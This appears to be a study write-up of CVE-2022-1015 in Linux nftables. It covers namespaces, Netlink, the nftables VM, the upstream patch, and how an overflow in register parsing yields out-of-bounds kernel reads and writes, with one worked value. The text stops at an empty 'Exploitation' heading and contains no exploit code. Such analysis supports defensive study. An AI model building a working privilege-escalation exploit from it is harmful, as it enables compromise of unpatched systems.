Background

Capabilities

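Modern Linux no longer has a simple root-versus-normal-user split. Privileges are divided into capabilities, so instead of handing a process full root, the kernel can grant only the fine-grained capabilities it needs, which minimizes risk.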
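To make the idea of per-capability bits concrete, here is a minimal sketch that reads the effective capability mask of the current process from /proc/self/status and tests a single bit. The helper names `mask_has_cap` and `read_effective_caps` are made up for this example; `CAP_NET_ADMIN` comes from `<linux/capability.h>`.

```c
#include <stdint.h>
#include <stdio.h>
#include <linux/capability.h>   /* CAP_NET_ADMIN and the other capability numbers */

/* Return 1 if capability number `cap` is set in the 64-bit mask, else 0. */
int mask_has_cap(uint64_t mask, int cap)
{
    return (int)((mask >> cap) & 1u);
}

/* Parse the "CapEff:" line of /proc/self/status (a hex bitmask).
 * Returns 0 on success, -1 if the file or the line is missing. */
int read_effective_caps(uint64_t *mask)
{
    char line[256];
    FILE *fp = fopen("/proc/self/status", "r");

    if (fp == NULL)
        return -1;
    while (fgets(line, sizeof(line), fp) != NULL) {
        unsigned long long value;

        if (sscanf(line, "CapEff: %llx", &value) == 1) {
            *mask = value;
            fclose(fp);
            return 0;
        }
    }
    fclose(fp);
    return -1;
}
```

Calling `read_effective_caps(&m)` and then `mask_has_cap(m, CAP_NET_ADMIN)` shows whether the process holds the capability that nftables configuration requires.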

Namespace

A namespace is an isolated space for security-related identifiers and attributes. For a user namespace this covers UIDs, GIDs, credentials, keys, capabilities, and so on.

- nested namespace: User namespaces can be nested. Every user namespace except the initial (root) namespace has a parent namespace, and each can have zero or more child namespaces. The parent is the user namespace of the process that created the new one by calling unshare or clone with the CLONE_NEWUSER flag.

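The kernel limits nesting to 32 levels. Every process is a member of exactly one user namespace. A process created by fork, or by clone without the CLONE_NEWUSER flag, belongs to the same user namespace as its parent. Namespaces are also used to implement Docker containers.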
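The creation step described above can be sketched roughly as follows. This is only an illustration under a few assumptions: the helper names are invented, the raw `unshare` syscall is used so that no feature-test macro is needed (the usual wrapper is `unshare(2)` from `<sched.h>`), and only a single-ID mapping is written.

```c
#include <stdio.h>
#include <unistd.h>        /* syscall */
#include <sys/syscall.h>   /* SYS_unshare */
#include <linux/sched.h>   /* CLONE_NEWUSER */

/* Format one uid_map/gid_map line: "<id inside> <id outside> <count>\n". */
int format_id_map(char *buf, size_t size, unsigned inside, unsigned outside)
{
    return snprintf(buf, size, "%u %u 1\n", inside, outside);
}

/* Move the calling process into a new child user namespace.
 * Returns 0 on success, -1 on failure (errno is set). */
int enter_new_user_ns(void)
{
    return (int)syscall(SYS_unshare, CLONE_NEWUSER);
}

/* Write `text` to `path`; returns 0 on success, -1 on failure. */
int write_text_file(const char *path, const char *text)
{
    FILE *fp = fopen(path, "w");

    if (fp == NULL)
        return -1;
    if (fputs(text, fp) == EOF) {
        fclose(fp);
        return -1;
    }
    return fclose(fp) == 0 ? 0 : -1;
}
```

A typical sequence would be: remember `getuid()` first, call `enter_new_user_ns()`, then write the line produced by `format_id_map(buf, sizeof(buf), 0, saved_uid)` to /proc/self/uid_map so that the caller appears as UID 0 inside the new namespace.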

This differs somewhat from a hypervisor. A hypervisor virtualizes hardware, whereas namespaces do not partition hardware; everything runs on the same OS kernel.

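Namespaces matter here because they widen the attack surface: an unprivileged user who creates a new user namespace gains capabilities such as CAP_NET_ADMIN inside it and can then reach kernel code, nftables included, that is otherwise restricted to root.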

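Netfilter subsystem

Netfilter is one of the kernel's subsystems; it handles network packet processing, routing, and related functions. The Netfilter project is the project responsible for that part of the kernel. It takes care of filtering, routing, NAT, packet modification, and so on.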



Netlink socket

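A Netlink socket is one of the IPC mechanisms for communication between the kernel and user space. One or more Netlink messages are concatenated and sent together as a single request or response. Padding may follow the header and the payload to keep them aligned.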

+----------------------+----------------------+----------------------+----------------------+ ~ ~ ~ ~ ~ +----------------------+

| Netlink message #1 | Netlink message #2 | Netlink message #3 | Netlink message #4 | ... | Netlink message #n |

| (Header+Payload+Pad) | (Header+Payload+Pad) | (Header+Payload+Pad) | (Header+Payload+Pad) | | (Header+Payload+Pad) |

+----------------------+----------------------+----------------------+----------------------+ ~ ~ ~ ~ ~ +----------------------+

<--------------------------------------------------- Request OR Response packet ----------------------------------------------->

The message format looks like this.

<------- NLA_HDRLEN ------> <-- NLA_ALIGN(payload)-->

+---------------------+- - -+- - - - - - - - - -+- - -+ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~

| Header | Pad | Payload | Pad | ... (Next attribute) ...

| (struct nlattr) | ing | | ing |

+---------------------+- - -+- - - - - - - - - -+- - -+ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~

↑ nlattr

<-------------- nlattr->nla_len -------------->

nla_type (16 bits)

+---+---+-------------------------------+

| N | O | Attribute Type |

+---+---+-------------------------------+

N := Carries nested attributes

O := Payload stored in network byte order

Note: The N and O flag are mutually exclusive.

<----- NLMSG_HDRLEN ------> <-------- Payload-Len -------->

+---------------------+- - -+- - - - - - - - - - - - - - - -+ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~

| Header | Pad | Payload | ... (Next netlink message) ...

| (struct nlmsghdr) | ing | Specific data + [attribute..] |

+---------------------+- - -+- - - - - - - - - - - - - - - -+ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~

↑ nlmsghdr ↑ NLMSG_DATA(&nlmsghdr) ↑ NLMSG_NEXT(&nlmsghdr)

<------------------ nlmsghdr->nlmsg_len ------------------>

<------------------ NLMSG_LENGTH(Payload-Len) ------------>

These are the Netlink message header and attribute structures.

struct nlmsghdr {

uint32_t nlmsg_len; /* Size of the Netlink message, including the header */

uint16_t nlmsg_type; /* Message content */

uint16_t nlmsg_flags; /* Additional flags */

uint32_t nlmsg_seq; /* Sequence number */

uint32_t nlmsg_pid; /* Sending process port ID */

};

struct nlattr {

uint16_t nla_len; /* Size of the attribute, including the header */

uint16_t nla_type; /* Attribute type */

};
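As a rough illustration of the attribute layout, the sketch below packs one attribute that carries a 32-bit big-endian value (the same encoding that `nla_get_be32` reads on the kernel side) and reads it back. `put_attr_be32` and `get_attr_be32` are hypothetical helper names; `struct nlattr`, `NLA_HDRLEN` and `NLA_ALIGN` come from `<linux/netlink.h>`.

```c
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>       /* htonl, ntohl */
#include <sys/socket.h>
#include <linux/netlink.h>   /* struct nlattr, NLA_HDRLEN, NLA_ALIGN */

/* Write one attribute carrying a 32-bit big-endian value at `buf`.
 * Returns the number of bytes consumed, padding included. */
size_t put_attr_be32(unsigned char *buf, uint16_t type, uint32_t value)
{
    struct nlattr nla;
    uint32_t be = htonl(value);

    nla.nla_type = type;
    /* nla_len counts header plus payload, but not the trailing padding. */
    nla.nla_len = (uint16_t)(NLA_HDRLEN + sizeof(be));
    memcpy(buf, &nla, sizeof(nla));
    memcpy(buf + NLA_HDRLEN, &be, sizeof(be));
    return (size_t)NLA_ALIGN(nla.nla_len);
}

/* Read back the 32-bit payload of the attribute that starts at `buf`. */
uint32_t get_attr_be32(const unsigned char *buf)
{
    uint32_t be;

    memcpy(&be, buf + NLA_HDRLEN, sizeof(be));
    return ntohl(be);
}
```

With a 4-byte header and a 4-byte payload no padding is needed, so the attribute occupies 8 bytes; a 5-byte payload would be padded up to 12.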

I was also able to find an example of how this is implemented in the examples.

s_socket = socket(PF_NETLINK, SOCK_RAW, NETLINK_XFRM);

__u32 s_nl_groups = 0; /* Start from an empty multicast group mask */

struct sockaddr_nl s_sockaddr_nl;

s_nl_groups |= XFRMNLGRP_ACQUIRE;

s_nl_groups |= XFRMNLGRP_EXPIRE;

s_nl_groups |= XFRMNLGRP_SA;

s_nl_groups |= XFRMNLGRP_POLICY;

s_nl_groups |= XFRMNLGRP_AEVENTS;

s_nl_groups |= XFRMNLGRP_REPORT;

s_nl_groups |= XFRMNLGRP_MIGRATE;

s_nl_groups |= XFRMNLGRP_MAPPING;

s_sockaddr_nl.nl_family = AF_NETLINK;

s_sockaddr_nl.nl_pad = (unsigned short)0u;

s_sockaddr_nl.nl_pid = (pid_t)0;

s_sockaddr_nl.nl_groups = s_nl_groups; /* Multicast groups mask */

bind(s_socket, (const struct sockaddr *)(&s_sockaddr_nl), (socklen_t)sizeof(s_sockaddr_nl));

sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);

socklen_t s_socklen;

s_socklen = (socklen_t)sizeof(s_sockaddr_nl);

s_recv_bytes = recvfrom(

s_socket,

s_buffer,

s_buffer_size,

MSG_NOSIGNAL,

(struct sockaddr *)(&s_sockaddr_nl),

(socklen_t *)(&s_socklen)

);

size_t s_msg_size;

struct nlmsghdr *s_nlmsghdr;

size_t s_payload_size;

void *s_payload;

s_msg_size = (size_t)s_recv_bytes;

for(s_nlmsghdr = (struct nlmsghdr *)s_buffer;(s_is_break == 0) && NLMSG_OK(s_nlmsghdr, s_msg_size);s_nlmsghdr = NLMSG_NEXT(s_nlmsghdr, s_msg_size)) { /* A single received Netlink packet can carry several Netlink headers; this loop splits it into one message per header */

s_payload_size = (size_t)NLMSG_PAYLOAD(s_nlmsghdr, 0); /* Size of the actual data in this message */

s_payload = NLMSG_DATA(s_nlmsghdr); /* Pointer to the actual data in this message */

switch(s_nlmsghdr->nlmsg_type) { /* Each message type has its own layout, so consult the kernel source to parse it. */

.....

}

}
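The receive loop above can be tried without a real socket. The following sketch builds two messages in a local buffer and walks them with the same `NLMSG_OK` / `NLMSG_NEXT` macros; `put_msg` and `count_msgs` are names invented for this example.

```c
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>   /* struct nlmsghdr, NLMSG_* macros */

/* Append one message with `len` payload bytes at `buf`.
 * Returns the bytes used, including alignment padding. */
size_t put_msg(unsigned char *buf, uint16_t type, const void *payload, size_t len)
{
    struct nlmsghdr nlh;

    memset(&nlh, 0, sizeof(nlh));
    nlh.nlmsg_len = (uint32_t)NLMSG_LENGTH(len);   /* header + payload */
    nlh.nlmsg_type = type;

    memset(buf, 0, NLMSG_SPACE(len));              /* zero the padding too */
    memcpy(buf, &nlh, sizeof(nlh));
    memcpy(buf + NLMSG_HDRLEN, payload, len);
    return NLMSG_SPACE(len);
}

/* Count the well-formed messages in a buffer of `size` bytes. */
int count_msgs(void *buf, size_t size)
{
    struct nlmsghdr *nlh;
    int remaining = (int)size;
    int n = 0;

    for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, remaining);
         nlh = NLMSG_NEXT(nlh, remaining))
        n++;
    return n;
}
```

A 5-byte payload gives `nlmsg_len` 21 and occupies 24 bytes in the buffer, which is why the walker must advance by the aligned length rather than by `nlmsg_len` itself.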

The socket uses the AF_NETLINK domain with SOCK_RAW. The protocol argument selects the Netlink family, which decides which kernel module or Netlink group the socket communicates with. For example, NETLINK_ROUTE covers routing updates, IPv4 routing, and so on.



nftables

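nftables can replace iptables, ip6tables, arptables, and ebtables.

Packet filtering was originally done by iptables, and nftables was introduced as the framework to replace it.

Within the Netfilter subsystem, nftables takes over the role of iptables and lets rules be written for a VM.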

iptables vs. nftables

The differences are as shown above.

In nftables, packets are filtered by a lightweight virtual machine inside the kernel.





There are five hook points: prerouting, input, forward, output, and postrouting.

Prerouting fires when a packet arrives at the NIC, input when a packet is destined for the local host, and so on.



There are many important objects.



The most important one is the table.





A chain is a set of rules, and a rule is a set of expressions.

Expressions include meta, cmp, payload, bitwise, immediate, etc.





There are 16-byte registers.

They are called registers, but they are backed by memory,

with a linear memory layout.
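A small userspace model may help picture this linear layout. It assumes the sizes used by the kernel headers (16-byte classic registers, 4-byte 32-bit registers, 20 words in total); `struct regs_model` and the two helpers are stand-ins written for this note, not kernel code.

```c
#include <stdint.h>
#include <stddef.h>

#define NFT_REG_SIZE    16   /* bytes in one classic 16-byte register */
#define NFT_REG32_SIZE   4   /* bytes in one 32-bit register */

/* Stand-in for the kernel's register file: 20 words = 80 bytes.
 * Words 0..3 hold the verdict, words 4..19 are the data registers. */
struct regs_model {
    uint32_t data[20];
};

/* Word index where 16-byte register n starts (0 = verdict, 1..4 = data). */
unsigned reg16_to_word(unsigned n)
{
    return n * NFT_REG_SIZE / NFT_REG32_SIZE;
}

/* Word index of 32-bit register k (0..15); these follow the verdict words. */
unsigned reg32_to_word(unsigned k)
{
    return k + NFT_REG_SIZE / NFT_REG32_SIZE;
}
```

Both addressing schemes index the same array: the first 16-byte data register and the first 32-bit register start at word 4, so they alias the same memory.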



There is the meta expression.

The VM supports maps, so data can be loaded and stored by key.

bitwise performs bit operations between registers.



There is also the payload expression, which is used to copy data.

CVE-2022-1015

net/netfilter/nf_tables_api.c | 22 +++++++++++++++++-----

1 file changed, 17 insertions(+), 5 deletions(-)

diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c

index d71a33ae39b3..1f5a0eece0d1 100644

--- a/net/netfilter/nf_tables_api.c

+++ b/net/netfilter/nf_tables_api.c

@@ -9275,17 +9275,23 @@ int nft_parse_u32_check(const struct nlattr *attr, int max, u32 *dest)

}

EXPORT_SYMBOL_GPL(nft_parse_u32_check);

-static unsigned int nft_parse_register(const struct nlattr *attr)

+static unsigned int nft_parse_register(const struct nlattr *attr, u32 *preg)

{

unsigned int reg;

reg = ntohl(nla_get_be32(attr));

switch (reg) {

case NFT_REG_VERDICT...NFT_REG_4:

- return reg * NFT_REG_SIZE / NFT_REG32_SIZE;

+ *preg = reg * NFT_REG_SIZE / NFT_REG32_SIZE;

+ break;

+ case NFT_REG32_00...NFT_REG32_15:

+ *preg = reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;

+ break;

default:

- return reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;

+ return -ERANGE;

}

+

+ return 0;

}

/**

@@ -9327,7 +9333,10 @@ int nft_parse_register_load(const struct nlattr *attr, u8 *sreg, u32 len)

u32 reg;

int err;

- reg = nft_parse_register(attr);

+ err = nft_parse_register(attr, &reg);

+ if (err < 0)

+ return err;

+

err = nft_validate_register_load(reg, len);

if (err < 0)

return err;

@@ -9382,7 +9391,10 @@ int nft_parse_register_store(const struct nft_ctx *ctx,

int err;

u32 reg;

- reg = nft_parse_register(attr);

+ err = nft_parse_register(attr, &reg);

+ if (err < 0)

+ return err;

+

err = nft_validate_register_store(ctx, reg, data, type, len);

if (err < 0)

return err;

--

If the value is not in NFT_REG_VERDICT ... NFT_REG_4, the code simply assumes it is a REG32 register.

int nft_parse_register_load(const struct nlattr *attr, u8 *sreg, u32 len)

{

u32 reg;

int err;

reg = nft_parse_register(attr);

err = nft_validate_register_load(reg, len);

if (err < 0)

return err;

*sreg = reg;

return 0;

}

EXPORT_SYMBOL_GPL(nft_parse_register_load);

...

EXPORT_SYMBOL_GPL(nft_parse_u32_check);

static unsigned int nft_parse_register(const struct nlattr *attr)

{

unsigned int reg;

reg = ntohl(nla_get_be32(attr));

switch (reg) {

case NFT_REG_VERDICT...NFT_REG_4:

return reg * NFT_REG_SIZE / NFT_REG32_SIZE;

default:

return reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;

}

}

...

EXPORT_SYMBOL_GPL(nft_dump_register);

static int nft_validate_register_load(enum nft_registers reg, unsigned int len)

{

if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)

return -EINVAL;

if (len == 0)

return -EINVAL;

if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data))

return -ERANGE;

return 0;

}

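The validation check can be bypassed as well. reg < 4 → EINVAL.

Because reg is multiplied by 4 (NFT_REG32_SIZE) in 32-bit arithmetic, a large value overflows and the range check passes. The result is an out-of-bounds access, and the same thing happens on the register store path.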
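The overflow is easier to see in a userspace re-creation of the two functions. The sketch below is my own model, not kernel code: the enum values and the 80-byte size of the register data are taken from the kernel headers as I understand them, and the function names are invented. It also includes the patched parser for comparison.

```c
#include <stdint.h>
#include <errno.h>

enum {
    NFT_REG_VERDICT = 0, NFT_REG_1 = 1, NFT_REG_4 = 4,
    NFT_REG32_00 = 8, NFT_REG32_15 = 23,
};
#define NFT_REG_SIZE    16
#define NFT_REG32_SIZE   4
#define REGS_DATA_BYTES 80   /* assumed sizeof_field(struct nft_regs, data) */

/* Pre-patch behaviour: anything above NFT_REG_4 is treated as a REG32 value. */
uint32_t parse_register_vuln(uint32_t reg)
{
    if (reg <= NFT_REG_4)
        return reg * NFT_REG_SIZE / NFT_REG32_SIZE;
    return reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;   /* reg - 4 */
}

/* Post-patch behaviour: values outside both valid ranges are rejected. */
int parse_register_fixed(uint32_t reg, uint32_t *preg)
{
    if (reg <= NFT_REG_4)
        *preg = reg * NFT_REG_SIZE / NFT_REG32_SIZE;
    else if (reg >= NFT_REG32_00 && reg <= NFT_REG32_15)
        *preg = reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;
    else
        return -ERANGE;
    return 0;
}

/* The same three checks as nft_validate_register_load, in 32-bit arithmetic. */
int validate_register_load(uint32_t reg, uint32_t len)
{
    if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
        return -EINVAL;
    if (len == 0)
        return -EINVAL;
    if (reg * NFT_REG32_SIZE + len > REGS_DATA_BYTES)   /* wraps for a huge reg */
        return -ERANGE;
    return 0;
}
```

For instance, an attribute value of 0xffffffec parses to 0xffffffe8; 0xffffffe8 * 4 + 0x70 wraps to 0x10, which is below 80, so the check passes. The caller then stores the value into a u8, leaving index 0xe8, far beyond the 20-word register array. The patched parser returns -ERANGE for the same input.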

nft_payload

if (tb[NFTA_PAYLOAD_SREG] != NULL) {

if (tb[NFTA_PAYLOAD_DREG] != NULL)

return ERR_PTR(-EINVAL);

return &nft_payload_set_ops;

}

offset = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_OFFSET]));

len = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_LEN]));

if (len <= 4 && is_power_of_2(len) && IS_ALIGNED(offset, len) &&

base != NFT_PAYLOAD_LL_HEADER)

return &nft_payload_fast_ops;

else

return &nft_payload_ops;

SREG == NOT NULL / DREG == NULL -> payload_set_ops

SREG == NULL / DREG == NOT NULL -> payload_ops or fast

So the expression can be set up in one of two ways.
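The selection logic can be summarized as a plain function. This is a simplified sketch with invented names; the rejection of a request that carries neither register is an assumption on my part, since the excerpt above does not show that case.

```c
#include <stdint.h>
#include <stdbool.h>

enum payload_base { BASE_LL_HEADER, BASE_NETWORK_HEADER, BASE_TRANSPORT_HEADER };
enum payload_ops  { OPS_INVALID, OPS_SET, OPS_FAST, OPS_NORMAL };

/* True when n is a non-zero power of two. */
static bool is_pow2(uint32_t n)
{
    return n != 0 && (n & (n - 1)) == 0;
}

/* Mirror of the ops selection: SREG picks the "set" ops, DREG picks the
 * load ops (fast path for small, aligned, non-link-layer reads). */
enum payload_ops select_payload_ops(bool has_sreg, bool has_dreg,
                                    enum payload_base base,
                                    uint32_t offset, uint32_t len)
{
    if (has_sreg)
        return has_dreg ? OPS_INVALID : OPS_SET;
    if (!has_dreg)
        return OPS_INVALID;   /* assumption: neither register given is rejected */
    if (len <= 4 && is_pow2(len) && offset % len == 0 &&
        base != BASE_LL_HEADER)
        return OPS_FAST;
    return OPS_NORMAL;
}
```

A 2-byte read at offset 2 of the transport header lands on the fast ops, while a 0x70-byte read falls through to the normal ops.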

static const struct nft_expr_ops nft_payload_set_ops = {

.type = &nft_payload_type,

.size = NFT_EXPR_SIZE(sizeof(struct nft_payload_set)),

.eval = nft_payload_set_eval,

.init = nft_payload_set_init,

.dump = nft_payload_set_dump,

};

static const struct nft_expr_ops nft_payload_ops = {

.type = &nft_payload_type,

.size = NFT_EXPR_SIZE(sizeof(struct nft_payload)),

.eval = nft_payload_eval,

.init = nft_payload_init,

.dump = nft_payload_dump,

.offload = nft_payload_offload,

};

const struct nft_expr_ops nft_payload_fast_ops = {

.type = &nft_payload_type,

.size = NFT_EXPR_SIZE(sizeof(struct nft_payload)),

.eval = nft_payload_eval,

.init = nft_payload_init,

.dump = nft_payload_dump,

.offload = nft_payload_offload,

};

The real functional difference is between payload_ops and set_ops. The call order is init → eval.

nft_payload_ops

static int nft_payload_init(const struct nft_ctx *ctx,

const struct nft_expr *expr,

const struct nlattr * const tb[])

{

struct nft_payload *priv = nft_expr_priv(expr);

priv->base = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_BASE]));

priv->offset = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_OFFSET]));

priv->len = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_LEN]));

return nft_parse_register_store(ctx, tb[NFTA_PAYLOAD_DREG],

&priv->dreg, NULL, NFT_DATA_VALUE,

priv->len);

}

In init, the validation can be bypassed so that dreg ends up out of bounds.

void nft_payload_eval(const struct nft_expr *expr,

struct nft_regs *regs,

const struct nft_pktinfo *pkt)

{

const struct nft_payload *priv = nft_expr_priv(expr);

const struct sk_buff *skb = pkt->skb;

u32 *dest = &regs->data[priv->dreg];

int offset;

if (priv->len % NFT_REG32_SIZE)

dest[priv->len / NFT_REG32_SIZE] = 0;

switch (priv->base) {

case NFT_PAYLOAD_LL_HEADER:

if (!skb_mac_header_was_set(skb))

goto err;

if (skb_vlan_tag_present(skb)) {

if (!nft_payload_copy_vlan(dest, skb,

priv->offset, priv->len))

goto err;

return;

}

offset = skb_mac_header(skb) - skb->data;

break;

case NFT_PAYLOAD_NETWORK_HEADER:

offset = skb_network_offset(skb);

break;

case NFT_PAYLOAD_TRANSPORT_HEADER:

if (!pkt->tprot_set)

goto err;

offset = nft_thoff(pkt);

break;

default:

BUG();

}

offset += priv->offset;

if (skb_copy_bits(skb, offset, dest, priv->len) < 0)

goto err;

return;

err:

regs->verdict.code = NFT_BREAK;

}

The actual work is done in eval.

int skb_copy_bits(const struct sk_buff *skb, int offset, void *to, int len)

{

int start = skb_headlen(skb);

struct sk_buff *frag_iter;

int i, copy;

if (offset > (int)skb->len - len)

goto fault;

/* Copy header. */

if ((copy = start - offset) > 0) {

if (copy > len)

copy = len;

skb_copy_from_linear_data_offset(skb, offset, to, copy);

if ((len -= copy) == 0)

return 0;

offset += copy;

to += copy;

}

for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) {

int end;

skb_frag_t *f = &skb_shinfo(skb)->frags[i];

WARN_ON(start > offset + len);

end = start + skb_frag_size(f);

if ((copy = end - offset) > 0) {

u32 p_off, p_len, copied;

struct page *p;

u8 *vaddr;

if (copy > len)

copy = len;

skb_frag_foreach_page(f,

skb_frag_off(f) + offset - start,

copy, p, p_off, p_len, copied) {

vaddr = kmap_atomic(p);

memcpy(to + copied, vaddr + p_off, p_len);

kunmap_atomic(vaddr);

}

if ((len -= copy) == 0)

return 0;

offset += copy;

to += copy;

}

start = end;

}

skb_walk_frags(skb, frag_iter) {

int end;

WARN_ON(start > offset + len);

end = start + frag_iter->len;

if ((copy = end - offset) > 0) {

if (copy > len)

copy = len;

if (skb_copy_bits(frag_iter, offset - start, to, copy))

goto fault;

if ((len -= copy) == 0)

return 0;

offset += copy;

to += copy;

}

start = end;

}

if (!len)

return 0;

fault:

return -EFAULT;

}

EXPORT_SYMBOL(skb_copy_bits);

static inline void skb_copy_from_linear_data_offset(const struct sk_buff *skb,

const int offset, void *to,

const unsigned int len)

{

memcpy(to, skb->data + offset, len);

}

OOB write

nft_payload_set_ops

static int nft_payload_set_init(const struct nft_ctx *ctx,

const struct nft_expr *expr,

const struct nlattr * const tb[])

{

struct nft_payload_set *priv = nft_expr_priv(expr);

priv->base = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_BASE]));

priv->offset = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_OFFSET]));

priv->len = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_LEN]));

if (tb[NFTA_PAYLOAD_CSUM_TYPE])

priv->csum_type =

ntohl(nla_get_be32(tb[NFTA_PAYLOAD_CSUM_TYPE]));

if (tb[NFTA_PAYLOAD_CSUM_OFFSET])

priv->csum_offset =

ntohl(nla_get_be32(tb[NFTA_PAYLOAD_CSUM_OFFSET]));

if (tb[NFTA_PAYLOAD_CSUM_FLAGS]) {

u32 flags;

flags = ntohl(nla_get_be32(tb[NFTA_PAYLOAD_CSUM_FLAGS]));

if (flags & ~NFT_PAYLOAD_L4CSUM_PSEUDOHDR)

return -EINVAL;

priv->csum_flags = flags;

}

switch (priv->csum_type) {

case NFT_PAYLOAD_CSUM_NONE:

case NFT_PAYLOAD_CSUM_INET:

break;

case NFT_PAYLOAD_CSUM_SCTP:

if (priv->base != NFT_PAYLOAD_TRANSPORT_HEADER)

return -EINVAL;

if (priv->csum_offset != offsetof(struct sctphdr, checksum))

return -EINVAL;

break;

default:

return -EOPNOTSUPP;

}

return nft_parse_register_load(tb[NFTA_PAYLOAD_SREG], &priv->sreg,

priv->len);

}

This is where the function from earlier, nft_parse_register_load, gets called.

static void nft_payload_set_eval(const struct nft_expr *expr,

struct nft_regs *regs,

const struct nft_pktinfo *pkt)

{

const struct nft_payload_set *priv = nft_expr_priv(expr);

struct sk_buff *skb = pkt->skb;

const u32 *src = &regs->data[priv->sreg];

int offset, csum_offset;

__wsum fsum, tsum;

switch (priv->base) {

case NFT_PAYLOAD_LL_HEADER:

if (!skb_mac_header_was_set(skb))

goto err;

offset = skb_mac_header(skb) - skb->data;

break;

case NFT_PAYLOAD_NETWORK_HEADER:

offset = skb_network_offset(skb);

break;

case NFT_PAYLOAD_TRANSPORT_HEADER:

if (!pkt->tprot_set)

goto err;

offset = nft_thoff(pkt);

break;

default:

BUG();

}

csum_offset = offset + priv->csum_offset;

offset += priv->offset;

if ((priv->csum_type == NFT_PAYLOAD_CSUM_INET || priv->csum_flags) &&

(priv->base != NFT_PAYLOAD_TRANSPORT_HEADER ||

skb->ip_summed != CHECKSUM_PARTIAL)) {

fsum = skb_checksum(skb, offset, priv->len, 0);

tsum = csum_partial(src, priv->len, 0);

if (priv->csum_type == NFT_PAYLOAD_CSUM_INET &&

nft_payload_csum_inet(skb, src, fsum, tsum, csum_offset))

goto err;

if (priv->csum_flags &&

nft_payload_l4csum_update(pkt, skb, fsum, tsum) < 0)

goto err;

}

if (skb_ensure_writable(skb, max(offset + priv->len, 0)) ||

skb_store_bits(skb, offset, src, priv->len) < 0)

goto err;

if (priv->csum_type == NFT_PAYLOAD_CSUM_SCTP &&

pkt->tprot == IPPROTO_SCTP &&

skb->ip_summed != CHECKSUM_PARTIAL) {

if (nft_payload_csum_sctp(skb, nft_thoff(pkt)))

goto err;

}

return;

err:

regs->verdict.code = NFT_BREAK;

}

int skb_store_bits(struct sk_buff *skb, int offset, const void *from, int len)

{

int start = skb_headlen(skb);

struct sk_buff *frag_iter;

int i, copy;

if (offset > (int)skb->len - len)

goto fault;

if ((copy = start - offset) > 0) {

if (copy > len)

copy = len;

skb_copy_to_linear_data_offset(skb, offset, from, copy);

if ((len -= copy) == 0)

return 0;

offset += copy;

from += copy;

}

for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) {

skb_frag_t *frag = &skb_shinfo(skb)->frags[i];

int end;

WARN_ON(start > offset + len);

end = start + skb_frag_size(frag);

if ((copy = end - offset) > 0) {

u32 p_off, p_len, copied;

struct page *p;

u8 *vaddr;

if (copy > len)

copy = len;

skb_frag_foreach_page(frag,

skb_frag_off(frag) + offset - start,

copy, p, p_off, p_len, copied) {

vaddr = kmap_atomic(p);

memcpy(vaddr + p_off, from + copied, p_len);

kunmap_atomic(vaddr);

}

if ((len -= copy) == 0)

return 0;

offset += copy;

from += copy;

}

start = end;

}

skb_walk_frags(skb, frag_iter) {

int end;

WARN_ON(start > offset + len);

end = start + frag_iter->len;

if ((copy = end - offset) > 0) {

if (copy > len)

copy = len;

if (skb_store_bits(frag_iter, offset - start,

from, copy))

goto fault;

if ((len -= copy) == 0)

return 0;

offset += copy;

from += copy;

}

start = end;

}

if (!len)

return 0;

fault:

return -EFAULT;

}

EXPORT_SYMBOL(skb_store_bits);

...

static inline void skb_copy_to_linear_data_offset(struct sk_buff *skb,

const int offset,

const void *from,

const unsigned int len)

{

memcpy(skb->data + offset, from, len);

}

OOB read

case NFT_META_L4PROTO:

if (!pkt->tprot_set)

goto err;

nft_reg_store8(dest, pkt->tprot);

break;

...

if (pkt->tprot != IPPROTO_TCP &&

pkt->tprot != IPPROTO_UDP) {

regs->verdict.code = NFT_BREAK;

return;

}

...

#define IPPROTO_UDP IPPROTO_UDP

...

enum {

IPPROTO_IP = 0, /* Dummy protocol for TCP */

#define IPPROTO_IP IPPROTO_IP

IPPROTO_ICMP = 1, /* Internet Control Message Protocol */

#define IPPROTO_ICMP IPPROTO_ICMP

IPPROTO_IGMP = 2, /* Internet Group Management Protocol */

#define IPPROTO_IGMP IPPROTO_IGMP

IPPROTO_IPIP = 4, /* IPIP tunnels (older KA9Q tunnels use 94) */

#define IPPROTO_IPIP IPPROTO_IPIP

IPPROTO_TCP = 6, /* Transmission Control Protocol */

#define IPPROTO_TCP IPPROTO_TCP

IPPROTO_EGP = 8, /* Exterior Gateway Protocol */

#define IPPROTO_EGP IPPROTO_EGP

IPPROTO_PUP = 12, /* PUP protocol */

#define IPPROTO_PUP IPPROTO_PUP

IPPROTO_UDP = 17, /* User Datagram Protocol */

Digging through the macros showed how the L4 protocol part is filtered: UDP is protocol number 17.

enum nft_payload_bases {

NFT_PAYLOAD_LL_HEADER,

NFT_PAYLOAD_NETWORK_HEADER,

NFT_PAYLOAD_TRANSPORT_HEADER,

};

The base can also be set here to choose which header is checked.

Exploitation

